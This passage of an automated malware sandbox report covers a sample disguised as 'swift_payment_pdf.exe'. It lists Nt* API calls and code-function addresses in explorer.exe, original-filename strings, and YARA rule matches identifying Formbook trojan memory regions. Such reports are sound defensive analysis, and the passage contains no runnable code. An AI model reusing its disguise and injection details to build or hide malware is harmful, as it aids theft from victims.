            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05012AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05013010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05013090 NtSetValueKey
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05013D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05013D70 NtOpenThread
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_02F18240 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_02F180E0 NtClose
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_02F18040 NtDeleteFile
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_02F17F50 NtReadFile
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_02F17DF0 NtCreateFile
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 0_2_014CD5BC
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 0_2_04ED65E7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 0_2_04ED8680
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 0_2_04ED8670
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 0_2_04ED6E78
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 0_2_04EDCE58
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 0_2_04ED8FB0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 0_2_04ED6A40
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 0_2_04ED6A30
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_00401160
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_00410113
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0042D933
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_00403190
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_00416A5F
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_00416A63
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_00410333
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0040E3B3
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_00402500
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013FA118
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01350100
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013E8158
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_014181CC
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_014141A2
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_014201AA
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013F2000
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0141A352
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_014203E6
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0136E3F0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01400274
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013E02C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01360535
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01420591
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01412446
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01404420
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0140E4F6
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01360770
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01384750
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0135C7C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0137C6E0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01376962
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013629A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0142A9A6
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01362840
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0136A840
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013468B8
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0138E8F0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0141AB40
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01416BD7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0135EA80
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013FCD1F
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0136AD00
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01378DBF
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0135ADE0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01360C00
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01350CF2
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01400CB5
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01380F30
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013A2F28
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01402F30
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013D4F40
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013DEFA0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01352FC8
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0141EE26
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01360E59
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0141EEDB
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01372E90
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0141CE93
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0142B16B
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0134F172
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0139516C
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0136B1B0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0140F0CC
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0141F0E0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_014170E9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013670C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0141132D
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0134D34C
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013A739A
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013652A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_014012ED
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0137D2F0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0137B2C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01417571
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_014295C3
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013FD5B0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01351460
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0141F43F
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0141F7B0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013A5630
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_014116CC
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013F5910
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01369950
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0137B950
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013CD800
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013638E0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0141FB76
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0137FB80
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0139DBF9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013D5BF0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01417A46
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0141FA49
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013D3A6C
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0140DAC6
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013FDAAC
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013A5AA0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01401AA3
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01411D5A
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01417D73
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01363D40
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0137FDC0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_013D9C32
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0141FCF2
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0141FF09
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01361F92
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01323FD2
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01323FD5
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_0141FFB1
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe | Code function: 5_2_01369EB0
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | Code function: 6_2_0492A844
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | Code function: 6_2_0492C5F9
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | Code function: 6_2_04949E19
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | Code function: 6_2_04932F45
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | Code function: 6_2_04932F49
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | Code function: 6_2_0492A899
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe | Code function: 6_2_0492C819
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_050A0591
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05084420
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05092446
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FE0535
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0508E4F6
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FFC6E0
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05004750
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FDC7C0
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FE0770
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0507A118
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05068158
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_050A01AA
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_050941A2
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_050981CC
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05072000
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FD0100
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0509A352
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_050A03E6
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FEE3F0
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05080274
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_050602C0
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FD0CF2
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0507CD1F
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FE0C00
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FDADE0
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FF8DBF
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05080CB5
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FEAD00
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05022F28
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05000F30
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05082F30
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05054F40
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FF2E90
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0505EFA0
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FE0E59
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0509EE26
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FD2FC8
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0509CE93
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0509EEDB
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FC68B8
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_050AA9A6
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FE2840
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FEA840
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FE29A0
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FF6962
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0500E8F0
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0509AB40
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FDEA80
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05096BD7
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05097571
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FD1460
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0507D5B0
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_050A95C3
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0509F43F
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0509F7B0
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05025630
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_050916CC
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FE70C0
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_050AB16B
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0501516C
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FEB1B0
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FCF172
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0508F0CC
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_050970E9
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0509F0E0
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FFD2F0
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0509132D
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FFB2C0
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FE52A0
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0502739A
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FCD34C
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_050812ED
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05091D5A
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05097D73
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05059C32
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FFFDC0
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FE3D40
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0509FCF2
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0509FF09
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FE9EB0
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0509FFB1
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FA3FD2
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FA3FD5
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FE1F92
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05075910
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FE38E0
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0504D800
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FE9950
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FFB950
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0509FB76
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05055BF0
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0501DBF9
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0509FA49
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05097A46
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05053A6C
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04FFFB80
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05025AA0
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0507DAAC
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_05081AA3
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0508DAC6
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_02F01B20
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_02F05990
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_02F1A520
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_02EFAFA0
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_02EFCF20
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_02EFCD00
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_02F03650
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_02F0364C
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04DFB078
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04DFC00C
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04DFBC75
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_04DFBB54
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: String function: 01395130 appears 58 times
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: String function: 0134B970 appears 262 times
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: String function: 013A7E54 appears 107 times
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: String function: 013CEA12 appears 86 times
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: String function: 013DF290 appears 103 times
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 05015130 appears 58 times
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 0505F290 appears 103 times
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04FCB970 appears 262 times
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 0504EA12 appears 86 times
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 05027E54 appears 107 times
            Source: swift_payment_pdf.exe, 00000000.00000002.1912740382.0000000002EC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs swift_payment_pdf.exe
            Source: swift_payment_pdf.exe, 00000000.00000002.1916823492.0000000007A50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs swift_payment_pdf.exe
            Source: swift_payment_pdf.exe, 00000000.00000002.1916473043.0000000007450000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs swift_payment_pdf.exe
            Source: swift_payment_pdf.exe, 00000000.00000002.1911611651.0000000000FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs swift_payment_pdf.exe
            Source: swift_payment_pdf.exe, 00000000.00000002.1917077942.0000000007B90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameiDIX vs swift_payment_pdf.exe
            Source: swift_payment_pdf.exe, 00000000.00000002.1913294244.000000000489E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs swift_payment_pdf.exe
            Source: swift_payment_pdf.exe, 00000005.00000002.2253655752.000000000144D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs swift_payment_pdf.exe
            Source: swift_payment_pdf.exeBinary or memory string: OriginalFilenameiDIX.exeR vs swift_payment_pdf.exe
            Source: swift_payment_pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 5.2.swift_payment_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.swift_payment_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3554688554.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3556641408.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3554923179.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2253540662.0000000001270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
